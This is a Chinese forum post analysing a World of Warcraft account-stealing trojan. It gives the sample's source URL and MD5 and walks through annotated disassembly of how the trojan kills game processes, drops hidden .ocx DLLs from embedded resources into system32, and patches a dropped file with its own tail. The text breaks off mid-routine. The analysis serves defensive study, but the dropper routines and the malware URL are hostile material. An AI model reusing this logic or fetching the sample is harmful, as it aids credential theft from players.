[原创]Trojan-GameThief.Win32.WOW.afvm简要分析
发表于: 2011-7-31 16:38 7399
来源:http://web3.fimmu.com/sifa/img/wow.exe
MD5:1075c31ad368e04dda4e6d167947cacd
1.枚举系统进程,检查BigFoot.exe是否运行.
; sub_4011A0 - find a running process by image name (Toolhelp32 snapshot walk).
; Arg:    [esp+138] (0x128 locals + 3 pushes + retaddr) = image name to look for
; Return: eax = th32ProcessID of the first match; 0 if no match or if Process32First fails
; Locals: PROCESSENTRY32 at [esp+C], dwSize = 0x128; szExeFile (+0x24) is [esp+30],
;         th32ProcessID (+0x8) is [esp+14]
; Regs:   ebx = snapshot handle, esi = name argument, edi = lstrcmpiA
; NOTE(review): the "found" exit at 00401213 returns without closing the snapshot handle.
; Here the analyst annotates the name as "BigFoot.exe"; the same routine is reused with
; "wow.exe" (push 00404178 / call 004011A0 at 004028F8 in a later listing on this page).
004011A0 /$ 81EC 28010000 sub esp, 128 ; locals: PROCESSENTRY32 (0x128 bytes)
004011A6 |. 53 push ebx
004011A7 |. 56 push esi
004011A8 |. 57 push edi
004011A9 |. 6A 00 push 0 ; /ProcessID = 0
004011AB |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004011AD |. E8 CA190000 call <jmp.&KERNEL32.CreateToolhelp32S> ; \snapshot of all processes
004011B2 |. 8BD8 mov ebx, eax ; ebx = hSnapshot (not checked for INVALID_HANDLE_VALUE)
004011B4 |. B9 4A000000 mov ecx, 4A ; 0x4A dwords = 0x128 bytes
004011B9 |. 33C0 xor eax, eax
004011BB |. 8D7C24 0C lea edi, dword ptr [esp+C]
004011BF |. F3:AB rep stos dword ptr es:[edi] ; zero the PROCESSENTRY32
004011C1 |. 8D4424 0C lea eax, dword ptr [esp+C]
004011C5 |. C74424 0C 280>mov dword ptr [esp+C], 128 ; pe.dwSize = sizeof(PROCESSENTRY32)
004011CD |. 50 push eax ; /lppe
004011CE |. 53 push ebx ; |hSnapshot
004011CF |. E8 A2190000 call <jmp.&KERNEL32.Process32First> ; \first entry of the snapshot
004011D4 |. 85C0 test eax, eax
004011D6 |. 74 28 je short 00401200 ; enumeration failed -> return 0
004011D8 |. 8BB424 380100>mov esi, dword ptr [esp+138] ; esi = name argument
004011DF |. 8B3D 34304000 mov edi, dword ptr [<&KERNEL32.lstrc> ; kernel32.lstrcmpiA
004011E5 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; pe.szExeFile
004011E9 |. 51 |push ecx
004011EA |. 56 |push esi
004011EB |. FFD7 |call edi ; lstrcmpiA(name, pe.szExeFile), case-insensitive
004011ED |. 85C0 |test eax, eax
004011EF |. 74 22 |je short 00401213 ; equal -> found
004011F1 |. 8D5424 0C |lea edx, dword ptr [esp+C]
004011F5 |. 52 |push edx ; /lppe
004011F6 |. 53 |push ebx ; |hSnapshot
004011F7 |. E8 74190000 |call <jmp.&KERNEL32.Process32Next> ; \next entry
004011FC |. 85C0 |test eax, eax
004011FE |.^ 75 E5 \jnz short 004011E5 ; loop until the snapshot is exhausted
00401200 |> 53 push ebx ; /hObject
00401201 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the snapshot
00401207 |. 5F pop edi
00401208 |. 5E pop esi
00401209 |. 33C0 xor eax, eax ; not found -> 0
0040120B |. 5B pop ebx
0040120C |. 81C4 28010000 add esp, 128
00401212 |. C3 retn
00401213 |> 8B4424 14 mov eax, dword ptr [esp+14] ; found -> pe.th32ProcessID
00401217 |. 5F pop edi ; the snapshot handle in ebx is not closed on this path
00401218 |. 5E pop esi
00401219 |. 5B pop ebx
0040121A |. 81C4 28010000 add esp, 128
00401220 \. C3 retn
004028A4 |. 8B3D 90304000 mov edi, dword ptr [<&KERNEL32.Termi>; kernel32.TerminateProcess 004028AA |. 8B2D 8C304000 mov ebp, dword ptr [<&KERNEL32.OpenP>; kernel32.OpenProcess 004028B0 |. 8BF0 mov esi, eax 004028B2 |. 33DB xor ebx, ebx 004028B4 |. 83C4 04 add esp, 4 004028B7 |. 3BF3 cmp esi, ebx 004028B9 |. 76 15 jbe short 004028D0 ; 若没有检测到BigFoot.exe,则跳 004028BB |. 68 D0070000 push 7D0 ; /Timeout = 2000. ms 004028C0 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \睡眠2000ms 004028C6 |. 53 push ebx ; /ExitCode => 0 004028C7 |. 56 push esi ; |/ProcessId 004028C8 |. 53 push ebx ; ||Inheritable => FALSE 004028C9 |. 6A 01 push 1 ; ||Access = TERMINATE 004028CB |. FFD5 call ebp ; |\打开BigFoot.exe进程 004028CD |. 50 push eax ; |hProcess 004028CE |. FFD7 call edi ; \结束BigFoot.exe
; sub_4011A0 (second quotation of the same routine) - find a running process by image name.
; Arg:    [esp+138] (0x128 locals + 3 pushes + retaddr) = image name; the caller shown next
;         passes "wow.exe" (push 00404178 at 004028F8).
; Return: eax = th32ProcessID of the first match; 0 if no match or if Process32First fails
; Locals: PROCESSENTRY32 at [esp+C], dwSize = 0x128; szExeFile (+0x24) is [esp+30],
;         th32ProcessID (+0x8) is [esp+14]
; Regs:   ebx = snapshot handle, esi = name argument, edi = lstrcmpiA
; NOTE(review): the "found" exit at 00401213 returns without closing the snapshot handle.
004011A0 /$ 81EC 28010000 sub esp, 128 ; locals: PROCESSENTRY32 (0x128 bytes)
004011A6 |. 53 push ebx
004011A7 |. 56 push esi
004011A8 |. 57 push edi
004011A9 |. 6A 00 push 0 ; /ProcessID = 0
004011AB |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004011AD |. E8 CA190000 call <jmp.&KERNEL32.CreateToolhelp32S> ; \snapshot of all processes
004011B2 |. 8BD8 mov ebx, eax ; ebx = hSnapshot (not checked for INVALID_HANDLE_VALUE)
004011B4 |. B9 4A000000 mov ecx, 4A ; 0x4A dwords = 0x128 bytes
004011B9 |. 33C0 xor eax, eax
004011BB |. 8D7C24 0C lea edi, dword ptr [esp+C]
004011BF |. F3:AB rep stos dword ptr es:[edi] ; zero the PROCESSENTRY32
004011C1 |. 8D4424 0C lea eax, dword ptr [esp+C]
004011C5 |. C74424 0C 280>mov dword ptr [esp+C], 128 ; pe.dwSize = sizeof(PROCESSENTRY32)
004011CD |. 50 push eax ; /lppe
004011CE |. 53 push ebx ; |hSnapshot
004011CF |. E8 A2190000 call <jmp.&KERNEL32.Process32First> ; \first entry of the snapshot
004011D4 |. 85C0 test eax, eax
004011D6 |. 74 28 je short 00401200 ; enumeration failed -> return 0
004011D8 |. 8BB424 380100>mov esi, dword ptr [esp+138] ; esi = name argument ("wow.exe" here)
004011DF |. 8B3D 34304000 mov edi, dword ptr [<&KERNEL32.lstrc> ; kernel32.lstrcmpiA
004011E5 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; pe.szExeFile
004011E9 |. 51 |push ecx
004011EA |. 56 |push esi
004011EB |. FFD7 |call edi ; lstrcmpiA(name, pe.szExeFile), case-insensitive
004011ED |. 85C0 |test eax, eax
004011EF |. 74 22 |je short 00401213 ; equal -> found
004011F1 |. 8D5424 0C |lea edx, dword ptr [esp+C]
004011F5 |. 52 |push edx ; /lppe
004011F6 |. 53 |push ebx ; |hSnapshot
004011F7 |. E8 74190000 |call <jmp.&KERNEL32.Process32Next> ; \next entry
004011FC |. 85C0 |test eax, eax
004011FE |.^ 75 E5 \jnz short 004011E5 ; loop until the snapshot is exhausted
00401200 |> 53 push ebx ; /hObject
00401201 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the snapshot
00401207 |. 5F pop edi
00401208 |. 5E pop esi
00401209 |. 33C0 xor eax, eax ; not found -> 0
0040120B |. 5B pop ebx
0040120C |. 81C4 28010000 add esp, 128
00401212 |. C3 retn
00401213 |> 8B4424 14 mov eax, dword ptr [esp+14] ; found -> pe.th32ProcessID
00401217 |. 5F pop edi ; the snapshot handle in ebx is not closed on this path
00401218 |. 5E pop esi
00401219 |. 5B pop ebx
0040121A |. 81C4 28010000 add esp, 128
00401220 \. C3 retn
004028E3 |. 68 88130000 push 1388 ; /Timeout = 5000. ms 004028E8 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \暂停5000ms 004028EE |> 53 /push ebx 004028EF |. 56 |push esi 004028F0 |. 53 |push ebx 004028F1 |. 6A 01 |push 1 004028F3 |. FFD5 |call ebp ; 打开进程 004028F5 |. 50 |push eax 004028F6 |. FFD7 |call edi ; 结束wow.exe 004028F8 |. 68 78414000 |push 00404178 ; ASCII "wow.exe" 004028FD |. E8 9EE8FFFF |call 004011A0 00402902 |. 8BF0 |mov esi, eax 00402904 |. 83C4 04 |add esp, 4 00402907 |. 3BF3 |cmp esi, ebx 00402909 |.^ 77 E3 \ja short 004028EE
0040290B |> \68 B80B0000 push 0BB8 ; /Timeout = 3000. ms 00402910 |. FF15 88304000 call dword ptr [<&KERNEL32.Sleep>] ; \睡眠3000ms 00402916 |. 8B2D 7C304000 mov ebp, dword ptr [<&KERNEL32.GetSy>; kernel32.GetSystemDirectoryA 0040291C |. 8D8424 340400>lea eax, dword ptr [esp+434] 00402923 |. 68 04010000 push 104 ; /BufSize = 104 (260.) 00402928 |. 50 push eax ; |Buffer 00402929 |. FFD5 call ebp ; \检索系统文件夹路径 0040292B |. 8B35 4C304000 mov esi, dword ptr [<&KERNEL32.lstrc>; kernel32.lstrcatA 00402931 |. 8D8C24 340400>lea ecx, dword ptr [esp+434] 00402938 |. 68 6C414000 push 0040416C ; /StringToAdd = "\1016.ocx" 0040293D |. 51 push ecx ; |ConcatString 0040293E |. FFD6 call esi ; \连接字符%windir%\system32\1016.ocx 00402940 |. FF15 78304000 call dword ptr [<&KERNEL32.GetTickCou>; [返回系统开机时间 00402946 |. 33D2 xor edx, edx 00402948 |. 05 00000001 add eax, 1000000 0040294D |. 895424 11 mov dword ptr [esp+11], edx 00402951 |. 50 push eax ; /<%x> 00402952 |. 895424 19 mov dword ptr [esp+19], edx ; | 00402956 |. 8D4424 14 lea eax, dword ptr [esp+14] ; | 0040295A |. 895424 1D mov dword ptr [esp+1D], edx ; | 0040295E |. 68 68414000 push 00404168 ; |format = "%x" 00402963 |. 895424 25 mov dword ptr [esp+25], edx ; | 00402967 |. 50 push eax ; |s 00402968 |. 66:895424 2D mov word ptr [esp+2D], dx ; | 0040296D |. 885C24 1C mov byte ptr [esp+1C], bl ; | 00402971 |. 885424 2F mov byte ptr [esp+2F], dl ; | 00402975 |. FF15 A0304000 call dword ptr [<&MSVCRT.sprintf>] ; \输出系统开机时间 0040297B |. 83C4 0C add esp, 0C 0040297E |. 8D4C24 10 lea ecx, dword ptr [esp+10] 00402982 |. 68 58414000 push 00404158 ; ASCII "wuozwtmp.dat" 00402987 |. 51 push ecx 00402988 |. FFD6 call esi ; 连接字符 开机时间+wuozwtmp.dat 0040298A |. B9 40000000 mov ecx, 40 0040298F |. 33C0 xor eax, eax 00402991 |. 8D7C24 25 lea edi, dword ptr [esp+25] 00402995 |. 885C24 24 mov byte ptr [esp+24], bl 00402999 |. F3:AB rep stos dword ptr es:[edi] 0040299B |. 66:AB stos word ptr es:[edi] 0040299D |. 
8D5424 24 lea edx, dword ptr [esp+24] 004029A1 |. 52 push edx ; /Buffer 004029A2 |. 68 04010000 push 104 ; |BufSize = 104 (260.) 004029A7 |. AA stos byte ptr es:[edi] ; | 004029A8 |. FF15 50304000 call dword ptr [<&KERNEL32.GetTempPat>; \检索系统临时目录 004029AE |. 8D4424 10 lea eax, dword ptr [esp+10] 004029B2 |. 8D4C24 24 lea ecx, dword ptr [esp+24] 004029B6 |. 50 push eax 004029B7 |. 51 push ecx 004029B8 |. FFD6 call esi ; 将%temp%与开机时间+wuozwtmp.dat连接 004029BA |. 8D5424 24 lea edx, dword ptr [esp+24] 004029BE |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING 004029C0 |. 8D8424 380400>lea eax, dword ptr [esp+438] ; | 004029C7 |. 52 push edx ; |NewName 004029C8 |. 50 push eax ; |ExistingName 004029C9 |. FF15 74304000 call dword ptr [<&KERNEL32.MoveFileEx>; \将%windir%\1016.ocx移动到临时目录
; sub_401000 - write an embedded resource of type "DLL" to a file on disk.
; Args (5 pushes + retaddr = 0x18): [esp+18] = resource id (masked to 16 bits, i.e.
;       MAKEINTRESOURCE), [esp+1C] = destination path
; Return: eax = 1 on success; 0 on every failure path (eax still holds the failed API's
;       0/NULL result, or is cleared explicitly at 0040108D)
; Regs:  esi = own module handle, later the file handle; edi = hResInfo, later the path;
;       ebp = locked resource pointer; ebx = resource size; [esp+10] = bytes written
; NOTE(review): the WriteFile failure exit (004010AD) returns without closing the file
;       handle in esi, and the written byte count is never compared to the resource size.
;       The analyst's annotation below names %windir%\system\1016.ocx, while the caller
;       listing on this page builds the path as %windir%\system32\1016.ocx - confirm which.
00401000 /$ 51 push ecx ; 4-byte local for the WriteFile byte count ([esp+10] after the pushes)
00401001 |. 53 push ebx
00401002 |. 55 push ebp
00401003 |. 56 push esi
00401004 |. 57 push edi
00401005 |. 6A 00 push 0 ; /pModule = NULL
00401007 |. FF15 20304000 call dword ptr [<&KERNEL32.GetModuleH> ; \handle of the running image
0040100D |. 8BF0 mov esi, eax
0040100F |. 8B4424 18 mov eax, dword ptr [esp+18] ; arg1 = resource id
00401013 |. 25 FFFF0000 and eax, 0FFFF ; MAKEINTRESOURCE(id)
00401018 |. 68 00404000 push 00404000 ; /ResourceType = "DLL"
0040101D |. 50 push eax ; |ResourceName
0040101E |. 56 push esi ; |hModule
0040101F |. FF15 1C304000 call dword ptr [<&KERNEL32.FindResour> ; \look up "DLL" resource 0x6C (this call)
00401025 |. 8BF8 mov edi, eax
00401027 |. 85FF test edi, edi
00401029 |. 75 06 jnz short 00401031 ; found -> continue
0040102B |. 5F pop edi ; else return with eax = 0
0040102C |. 5E pop esi
0040102D |. 5D pop ebp
0040102E |. 5B pop ebx
0040102F |. 59 pop ecx
00401030 |. C3 retn
00401031 |> 57 push edi ; /hResource
00401032 |. 56 push esi ; |hModule
00401033 |. FF15 18304000 call dword ptr [<&KERNEL32.LoadResour> ; \load the resource
00401039 |. 85C0 test eax, eax
0040103B |. 75 06 jnz short 00401043 ; loaded -> continue
0040103D |. 5F pop edi ; else return with eax = 0
0040103E |. 5E pop esi
0040103F |. 5D pop ebp
00401040 |. 5B pop ebx
00401041 |. 59 pop ecx
00401042 |. C3 retn
00401043 |> 50 push eax ; /nHandles (OllyDbg mislabel: this is hResData)
00401044 |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour> ; \pointer to the resource bytes (4050C0 in the analyst's session)
0040104A |. 8BE8 mov ebp, eax
0040104C |. 85ED test ebp, ebp
0040104E |. 75 06 jnz short 00401056 ; locked -> continue
00401050 |. 5F pop edi ; else return with eax = 0
00401051 |. 5E pop esi
00401052 |. 5D pop ebp
00401053 |. 5B pop ebx
00401054 |. 59 pop ecx
00401055 |. C3 retn
00401056 |> 57 push edi ; /hResource
00401057 |. 56 push esi ; |hModule
00401058 |. FF15 10304000 call dword ptr [<&KERNEL32.SizeofReso> ; \size of the resource in bytes
0040105E |. 8B7C24 1C mov edi, dword ptr [esp+1C] ; arg2 = destination path
00401062 |. 6A 00 push 0 ; /FileAttributes = 0
00401064 |. 57 push edi ; |FileName
00401065 |. 8BD8 mov ebx, eax ; ebx = resource size
00401067 |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt> ; \clear attributes first (presumably so an existing hidden/system copy can be overwritten)
0040106D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040106F |. 6A 00 push 0 ; |Attributes = 0
00401071 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401073 |. 6A 00 push 0 ; |pSecurity = NULL
00401075 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401077 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040107C |. 57 push edi ; |FileName
0040107D |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \create/truncate the destination (analyst: %windir%\system\1016.ocx)
00401083 |. 8BF0 mov esi, eax
00401085 |. 83FE FF cmp esi, -1 ; INVALID_HANDLE_VALUE?
00401088 |. 75 08 jnz short 00401092 ; opened -> continue
0040108A |. 5F pop edi
0040108B |. 5E pop esi
0040108C |. 5D pop ebp
0040108D |. 33C0 xor eax, eax ; return 0
0040108F |. 5B pop ebx
00401090 |. 59 pop ecx
00401091 |. C3 retn
00401092 |> 8D4C24 10 lea ecx, dword ptr [esp+10] ; &bytesWritten
00401096 |. 6A 00 push 0 ; /pOverlapped = NULL
00401098 |. 51 push ecx ; |pBytesWritten
00401099 |. 53 push ebx ; |nBytesToWrite = resource size
0040109A |. 55 push ebp ; |/nHandles (OllyDbg mislabel: the already-locked pointer)
0040109B |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour> ; |\LockResource again on the pointer - looks redundant (OllyDbg's "SetHandleCount" label is a heuristic mislabel)
004010A1 |. 50 push eax ; |Buffer
004010A2 |. 56 push esi ; |hFile
004010A3 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>> ; \write the resource bytes (analyst: 0x1600 bytes from virus.004050C0 into 1016.ocx)
004010A9 |. 85C0 test eax, eax
004010AB |. 75 06 jnz short 004010B3 ; written -> continue
004010AD |. 5F pop edi ; else return 0 - note: esi (file handle) is not closed here
004010AE |. 5E pop esi
004010AF |. 5D pop ebp
004010B0 |. 5B pop ebx
004010B1 |. 59 pop ecx
004010B2 |. C3 retn
004010B3 |> 56 push esi ; /hObject
004010B4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the file
004010BA |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004010BC |. 57 push edi ; |FileName
004010BD |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt> ; \hide the dropped file (hidden + system)
004010C3 |. 5F pop edi
004010C4 |. 5E pop esi
004010C5 |. 5D pop ebp
004010C6 |. B8 01000000 mov eax, 1 ; success
004010CB |. 5B pop ebx
004010CC |. 59 pop ecx
004010CD \. C3 retn
004029E9 |. 68 48414000 push 00404148 ; /String2 = "WinWcolw.ocx" 004029EE |. 68 94414000 push 00404194 ; |String1 = virus.00404194 004029F3 |. FF15 44304000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \复制WinWcolw.ocx到缓冲区 004029F9 |. B9 00010000 mov ecx, 100 004029FE |. 33C0 xor eax, eax 00402A00 |. 8DBC24 340400>lea edi, dword ptr [esp+434] 00402A07 |. 8D9424 340400>lea edx, dword ptr [esp+434] 00402A0E |. 68 04010000 push 104 00402A13 |. 52 push edx 00402A14 |. F3:AB rep stos dword ptr es:[edi] 00402A16 |. FFD5 call ebp ; 检索系统文件夹路径 00402A18 |. 8D8424 340400>lea eax, dword ptr [esp+434] 00402A1F |. 68 90404000 push 00404090 00402A24 |. 50 push eax 00402A25 |. FFD6 call esi ; 连接字符%windir%\system32\ 00402A27 |. 8D8C24 340400>lea ecx, dword ptr [esp+434] 00402A2E |. 68 94414000 push 00404194 ; ASCII "WinWcolw.ocx" 00402A33 |. 51 push ecx 00402A34 |. FFD6 call esi ; 连接字符%windir%\system32\WinWcolw.ocx 00402A36 |. 8D9424 340400>lea edx, dword ptr [esp+434] 00402A3D |. 52 push edx 00402A3E |. 6A 6A push 6A 00402A40 |. E8 BBE5FFFF call 00401000
; sub_401000 (second quotation of the same routine) - write an embedded "DLL" resource to disk.
; This call (see the caller just above: push edx = path, push 6A, call 00401000) drops
; resource 0x6A to %windir%\system32\WinWcolw.ocx.
; Args (5 pushes + retaddr = 0x18): [esp+18] = resource id (masked to 16 bits),
;       [esp+1C] = destination path
; Return: eax = 1 on success; 0 on every failure path
; Regs:  esi = own module handle, later the file handle; edi = hResInfo, later the path;
;       ebp = locked resource pointer; ebx = resource size; [esp+10] = bytes written
; NOTE(review): the WriteFile failure exit (004010AD) returns without closing esi; the
;       written byte count is never compared to the resource size.
00401000 /$ 51 push ecx ; 4-byte local for the WriteFile byte count
00401001 |. 53 push ebx
00401002 |. 55 push ebp
00401003 |. 56 push esi
00401004 |. 57 push edi
00401005 |. 6A 00 push 0 ; /pModule = NULL
00401007 |. FF15 20304000 call dword ptr [<&KERNEL32.GetModuleH> ; \handle of the running image
0040100D |. 8BF0 mov esi, eax
0040100F |. 8B4424 18 mov eax, dword ptr [esp+18] ; arg1 = resource id (0x6A here)
00401013 |. 25 FFFF0000 and eax, 0FFFF ; MAKEINTRESOURCE(id)
00401018 |. 68 00404000 push 00404000 ; /ResourceType = "DLL"
0040101D |. 50 push eax ; |ResourceName
0040101E |. 56 push esi ; |hModule
0040101F |. FF15 1C304000 call dword ptr [<&KERNEL32.FindResour> ; \look up "DLL" resource 0x6A
00401025 |. 8BF8 mov edi, eax
00401027 |. 85FF test edi, edi
00401029 |. 75 06 jnz short 00401031 ; found -> continue
0040102B |. 5F pop edi ; else return with eax = 0
0040102C |. 5E pop esi
0040102D |. 5D pop ebp
0040102E |. 5B pop ebx
0040102F |. 59 pop ecx
00401030 |. C3 retn
00401031 |> 57 push edi ; /hResource
00401032 |. 56 push esi ; |hModule
00401033 |. FF15 18304000 call dword ptr [<&KERNEL32.LoadResour> ; \load the resource
00401039 |. 85C0 test eax, eax
0040103B |. 75 06 jnz short 00401043 ; loaded -> continue
0040103D |. 5F pop edi ; else return with eax = 0
0040103E |. 5E pop esi
0040103F |. 5D pop ebp
00401040 |. 5B pop ebx
00401041 |. 59 pop ecx
00401042 |. C3 retn
00401043 |> 50 push eax ; /nHandles (OllyDbg mislabel: this is hResData)
00401044 |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour> ; \pointer to the resource bytes (4066C0 in the analyst's session)
0040104A |. 8BE8 mov ebp, eax
0040104C |. 85ED test ebp, ebp
0040104E |. 75 06 jnz short 00401056 ; locked -> continue
00401050 |. 5F pop edi ; else return with eax = 0
00401051 |. 5E pop esi
00401052 |. 5D pop ebp
00401053 |. 5B pop ebx
00401054 |. 59 pop ecx
00401055 |. C3 retn
00401056 |> 57 push edi ; /hResource
00401057 |. 56 push esi ; |hModule
00401058 |. FF15 10304000 call dword ptr [<&KERNEL32.SizeofReso> ; \size of the resource in bytes
0040105E |. 8B7C24 1C mov edi, dword ptr [esp+1C] ; arg2 = destination path
00401062 |. 6A 00 push 0 ; /FileAttributes = 0
00401064 |. 57 push edi ; |FileName
00401065 |. 8BD8 mov ebx, eax ; ebx = resource size
00401067 |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt> ; \clear attributes first
0040106D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040106F |. 6A 00 push 0 ; |Attributes = 0
00401071 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401073 |. 6A 00 push 0 ; |pSecurity = NULL
00401075 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401077 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040107C |. 57 push edi ; |FileName
0040107D |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile> ; \create/truncate %windir%\system32\WinWcolw.ocx
00401083 |. 8BF0 mov esi, eax
00401085 |. 83FE FF cmp esi, -1 ; INVALID_HANDLE_VALUE?
00401088 |. 75 08 jnz short 00401092 ; opened -> continue
0040108A |. 5F pop edi
0040108B |. 5E pop esi
0040108C |. 5D pop ebp
0040108D |. 33C0 xor eax, eax ; return 0
0040108F |. 5B pop ebx
00401090 |. 59 pop ecx
00401091 |. C3 retn
00401092 |> 8D4C24 10 lea ecx, dword ptr [esp+10] ; &bytesWritten
00401096 |. 6A 00 push 0 ; /pOverlapped = NULL
00401098 |. 51 push ecx ; |pBytesWritten
00401099 |. 53 push ebx ; |nBytesToWrite = resource size
0040109A |. 55 push ebp ; |/nHandles (OllyDbg mislabel: the already-locked pointer)
0040109B |. FF15 14304000 call dword ptr [<&KERNEL32.LockResour> ; |\LockResource again on the pointer - looks redundant ("SetHandleCount" is an OllyDbg mislabel)
004010A1 |. 50 push eax ; |Buffer
004010A2 |. 56 push esi ; |hFile
004010A3 |. FF15 04304000 call dword ptr [<&KERNEL32.WriteFile>> ; \write the resource bytes (analyst: 0xDA00 bytes from virus.004066C0 into WinWcolw.ocx)
004010A9 |. 85C0 test eax, eax
004010AB |. 75 06 jnz short 004010B3 ; written -> continue
004010AD |. 5F pop edi ; else return 0 - note: esi (file handle) is not closed here
004010AE |. 5E pop esi
004010AF |. 5D pop ebp
004010B0 |. 5B pop ebx
004010B1 |. 59 pop ecx
004010B2 |. C3 retn
004010B3 |> 56 push esi ; /hObject
004010B4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl> ; \close the file
004010BA |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004010BC |. 57 push edi ; |FileName
004010BD |. FF15 0C304000 call dword ptr [<&KERNEL32.SetFileAtt> ; \hide the dropped file (hidden + system)
004010C3 |. 5F pop edi
004010C4 |. 5E pop esi
004010C5 |. 5D pop ebp
004010C6 |. B8 01000000 mov eax, 1 ; success
004010CB |. 5B pop ebx
004010CC |. 59 pop ecx
004010CD \. C3 retn
; sub_4010D0 - copy the last 0x4FA bytes of the running executable into another file.
; Arg:    [esp+618] (0x604 locals + 4 pushes + retaddr) = path of the file to write
;         (the analyst annotates it as %windir%\system32\WinWcolw.ocx)
; Return: nothing meaningful; eax is whatever the last API call left
; Locals: own path at [esp+4] (0x104 bytes), 0x4FA-byte tail buffer at [esp+108],
;         ReadFile/WriteFile byte count at [esp]
; Regs:   esi = CreateFileA, later the target handle; edi = own-file handle;
;         ebp = CloseHandle; ebx = SetFilePointer
; NOTE(review): the bytes-read count is never checked before the write. The second
;         SetFilePointer pushes OffsetLo = +0x4FA with Origin = FILE_END, i.e. 0x4FA bytes
;         PAST the end of the target - not "0x4FA bytes before the end" as the original
;         annotation says - so the tail is appended after a gap rather than overwriting the
;         target's own tail; confirm on a sample. CloseHandle(edi) is also reached when edi is
;         INVALID_HANDLE_VALUE.
004010D0 /$ 81EC 04060000 sub esp, 604
004010D6 |. 8D4424 04 lea eax, dword ptr [esp+4] ; own-path buffer
004010DA |. 55 push ebp
004010DB |. 56 push esi
004010DC |. 57 push edi
004010DD |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004010E2 |. 50 push eax ; |PathBuffer
004010E3 |. 6A 00 push 0 ; |hModule = NULL
004010E5 |. FF15 2C304000 call dword ptr [<&KERNEL32.GetModuleF> ; \full path of the running executable
004010EB |. 8B35 08304000 mov esi, dword ptr [<&KERNEL32.Creat> ; kernel32.CreateFileA
004010F1 |. 6A 00 push 0 ; /hTemplateFile = NULL
004010F3 |. 6A 00 push 0 ; |Attributes = 0
004010F5 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004010F7 |. 6A 00 push 0 ; |pSecurity = NULL
004010F9 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004010FB |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; | own path
004010FF |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401104 |. 51 push ecx ; |FileName
00401105 |. FFD6 call esi ; \open the running executable itself for reading
00401107 |. 8B2D 00304000 mov ebp, dword ptr [<&KERNEL32.Close> ; kernel32.CloseHandle
0040110D |. 8BF8 mov edi, eax
0040110F |. 83FF FF cmp edi, -1 ; INVALID_HANDLE_VALUE?
00401112 |. 74 79 je short 0040118D ; open failed -> skip to the (pointless) CloseHandle and return
00401114 |. 53 push ebx
00401115 |. 8B1D 28304000 mov ebx, dword ptr [<&KERNEL32.SetFi> ; kernel32.SetFilePointer
0040111B |. 6A 02 push 2 ; /Origin = FILE_END
0040111D |. 6A 00 push 0 ; |pOffsetHi = NULL
0040111F |. 68 06FBFFFF push -4FA ; |OffsetLo = FFFFFB06 (-1274.)
00401124 |. 57 push edi ; |hFile
00401125 |. FFD3 call ebx ; \seek to 0x4FA bytes before the end of its own file
00401127 |. 8D5424 10 lea edx, dword ptr [esp+10] ; &bytesRead
0040112B |. 6A 00 push 0 ; /pOverlapped = NULL
0040112D |. 52 push edx ; |pBytesRead
0040112E |. 8D8424 200100>lea eax, dword ptr [esp+120] ; | tail buffer
00401135 |. 68 FA040000 push 4FA ; |BytesToRead = 4FA (1274.)
0040113A |. 50 push eax ; |Buffer
0040113B |. 57 push edi ; |hFile
0040113C |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \read the 0x4FA-byte tail into the stack buffer (0012ED84 in the analyst's session); result/count not checked
00401142 |. 8B8C24 180600>mov ecx, dword ptr [esp+618] ; arg1 = target path
00401149 |. 6A 00 push 0 ; /hTemplateFile = NULL
0040114B |. 6A 00 push 0 ; |Attributes = 0
0040114D |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040114F |. 6A 00 push 0 ; |pSecurity = NULL
00401151 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401153 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401158 |. 51 push ecx ; |FileName
00401159 |. FFD6 call esi ; \open the target (analyst: %windir%\system32\WinWcolw.ocx)
0040115B |. 8BF0 mov esi, eax
0040115D |. 83FE FF cmp esi, -1 ; INVALID_HANDLE_VALUE?
00401160 |. 74 27 je short 00401189 ; open failed -> close handles and return
00401162 |. 6A 02 push 2 ; /Origin = FILE_END
00401164 |. 6A 00 push 0 ; |pOffsetHi = NULL
00401166 |. 68 FA040000 push 4FA ; |OffsetLo = 4FA (1274.) - positive: 0x4FA bytes beyond EOF
0040116B |. 56 push esi ; |hFile
0040116C |. FFD3 call ebx ; \seek past the end of the target (see NOTE above)
